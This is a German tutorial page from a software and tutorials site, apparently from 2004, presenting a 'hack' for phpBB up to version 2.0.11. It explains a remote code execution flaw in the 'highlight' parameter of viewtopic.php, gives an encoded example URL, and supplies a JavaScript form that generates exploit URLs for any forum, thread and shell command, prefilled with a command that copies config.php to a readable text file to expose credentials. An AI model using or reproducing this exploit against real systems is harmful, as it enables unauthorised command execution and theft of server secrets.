Mysmilies.net die Smilies Datenbank

Script oder Datei finden :

 
-Startseite
-Newsarchiv
-Newsletter
-Mein Dreamcodes
-Scripte
-eBooks
-Online Speicher
-Datenbanken
-Webseiten
-Trickfilm
-Web Grafiken
-Bildbearbeiter
-Browser
-EMail Software
-Ftp Clienten
-Betriebssysteme
-Texteditoren
-Wampserver
-Office Pakete
-Antivirus
-System Cleaner
-Recovery Tools
-Php Schnipsel
-Ajax Schnipsel
-VB Schnipsel
-Tutorials
-Workshops
-Webkatalog
-Leserforum
-Erweiterte Suche
-Sitemap
-Impressum
-neuste Downloads

1. Selfphp (391)
2. Xampp OS X (302)
3. Xampp Linux (300)
4. Xampp Windows (311)

-neuste Tutorials

1. Gratis USA Nummer (5523)
2. RAID (5346)
3. Text auf Grafik (5357)
4. String verschlüsseln (5491)


Tutorials Phpbb 2.xx Hack

 

Phpbb 2.xx Hack

Beim phpBB bis zur Version phpBB 2.0.11 kann man über einen Bug in der viewtopic.php einen beliebigen Code ausführen.

Beschreibung:

Wenn man bei der viewtopic.php den String "highlight" mitsendet und ihn entsprechent codiert kann man zum Beispiel auf einem Windows-Server (was zum Glück nicht so oft) jeden Dos Befehl ausführen lassen den man will. Das gleiche gilt natürlich auch für Linux.

Hier ein Beispiel: viewtopic.php?t=1&highlight=%2527%252esystem(chr(104)%252echr(101)%252echr(108)%252echr(112))%252e%2527

Der Codierte String wird von der viewtopic "entschlüsselt" und verarbeitet. Dieses Beispiel sendet den harmlosen Befehl "help".

Um den String zu codieren gibt es dieses kleine Skript  :
<script language="JavaScript">
<!--
function start()
{
var command = document.form.command.value;
var split = command.split("");

var array = new Array();

for (var a=0; a<command.length; a++){
if(a==command.length-1) {
var crypt = "chr("+split[a].charCodeAt()+")";
}
else {
var crypt = "chr("+split[a].charCodeAt()+")%252e";
}
array.push(crypt);
}

document.form.action = document.form.url.value+"/viewtopic.php?t="+document.form.threadid.value+"&highlight=%2527%252esystem("+array.join("")+")%252e%2527";
}

function check()
{
var url=document.form.url.value+"/viewtopic.php?t="+document.form.threadid.value;

window.open(url);
}
//-->
</script>
<noscript></noscript>

<form method="post" name="form" onSubmit="return start()">
<table width="98%" cellspacing="1" cellpadding="4" border="0" align="center" class="forumline">
<tr>
<th class="thHead" colspan="2">Hack 4 phpBB 2.0.11</th>
</tr>
<tr>
<td class="row2" colspan="2"><span class="gensmall">Items marked with a * are required unless stated otherwise</span></td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">URL: *</span></td>
<td class="row2">
<input type="text" name="url" size="50" value="http://www.example.com/phpBB2" /> <a href="javascript:check()">check</a>
</td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">Threadid: *</span></td>
<td class="row2">
<input type="text" name="threadid" size="50" value="1" />
</td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">Command: *</span></td>
<td class="row2">
<input type="text" name="command" size="50" value="copy config.php config.txt" />
</td>
</tr>
<tr>
<td class="catBottom" colspan="2" align="center">
<input type="submit" name="submit" value="Submit" class="mainoption" />
&nbsp;&nbsp;
<input type="reset" value="Reset" class="liteoption" />
</td>
</tr>
<tr>
</tr>
</table></form>

Wer den Text nutzt, ist für die Folgen selbst verantwortlich.

 
Seiten : 1
hinzugefügt am : 30.12.2004
Autor : Puwu
Listings ID : 580
Status zum lesen : Gast
gelesen : 2835 mal
[Druckansicht] [Lesercharts] [RSS] [zur Übersicht]
 
 

Die Möglichkeit diesen Artikel zu verlinken :

HTML-Code:

Code zum Einbinden in ein Forum:


Hinweis : Das lesen des Artikels Phpbb 2.xx Hack - listings ID: 580 auf Dreamcodes, sowie Link Verweise auf Internetseiten fremder Anbieter erfolgen auf eigene Gefahr. Dreamcodes haftet nicht für Schäden, die aus der Verwendung des Inhaltes der Artikel erfolgen könnten. Schadenersatzansprüche, aus welchem Rechtsgrund auch immer, sind ausgeschlossen !
-Live Statistik
Datum: 19.11.2017
Uhrzeit: 13:13 Uhr
Online: 8 User
User heute: 2663
User allgem.: 16247702

Eingeloggt als Gast
-Download des Monats
-
-unsere Monats Umfrage
Was ist davon interessanter?

Diverse Wallpaper
Motorrad Wallpaper
HDR Wallpaper
Auto Wallpaper
Personen Wallpaper

-unsere Bestseller